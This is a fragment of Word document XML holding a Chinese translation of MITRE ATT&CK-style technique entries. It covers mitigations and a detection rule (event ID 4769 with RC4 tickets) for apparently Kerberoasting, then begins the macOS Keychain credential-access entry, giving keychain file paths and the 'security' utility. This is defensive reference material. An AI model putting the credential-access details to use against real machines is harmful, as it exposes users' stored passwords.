              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="716A206C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="7204A73F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B777D8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId155" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="004779E1">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>加密敏感信息</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02181C5C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尽可能启用</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AES Kerberos</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加密（或其他更强大的加密算法），而不是</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>RC4</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="6CB0ABCC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37911413" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId156" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="004779E1">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53BBF4F1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保服务帐户的密码长度（理想情况下为</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>个字符以上）和复杂性，并且启用密码过期功能。同时可以考虑使用组托管服务帐户或其他第三方产品，例如密码存储。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="04BDE0D5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50BBA0AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId157" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="004779E1">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账户管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="490FF885" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将服务帐户限制为所需的最低权限，包括域管理员等特权组的成员身份。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03670F0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8CD4C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>启用审核</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>服务票证操作以记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Kerberos TGS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>服务票证请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>特别是调查不规则的活动模式（例如：帐户在很短的时间内发出大量请求，事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>ID 4769</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>尤其</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>也请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>RC4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>0x17]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E41760">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A8AE36" w14:textId="65ACBA57" w:rsidR="000F2665" w:rsidRDefault="006508E9" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Keychain</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="217C0B8A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="792FF9AC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> T1142</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="408A3432" w14:textId="1516F212" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
              </w:rPr>
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11012D9F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="753FDCDD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E08FBA7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C62CF2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统调用，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29AB08C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2ED379C9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F3E6E5" w14:textId="4103E3AF" w:rsidR="000F2665" w:rsidRDefault="006508E9" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>跟踪用户密码和凭据的内置方式，用于许多服务和功能，如</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>密码，网站，安全备注，证书和</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>于</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/Library/Keychains/</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/Library/Keychains/</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，和</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/Network/Library/Keychains/</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>实用程序（默认情况下内置于</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中）提供了管理这些凭据</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的有用方法。要管理其凭据，用户必须使用其他凭据来访问其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。如果攻击者知道登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的凭据，则他们可以访问存储在此库中的所有其他凭据</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>默认情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="002754A1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的密码是用户的登录凭据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED8EA0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2152"/>
        <w:gridCol w:w="7584"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="41B0E250" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2152" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="288542C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1B5FB509" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="1120E7EE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2152" w:type="dxa"/>
          </w:tcPr>
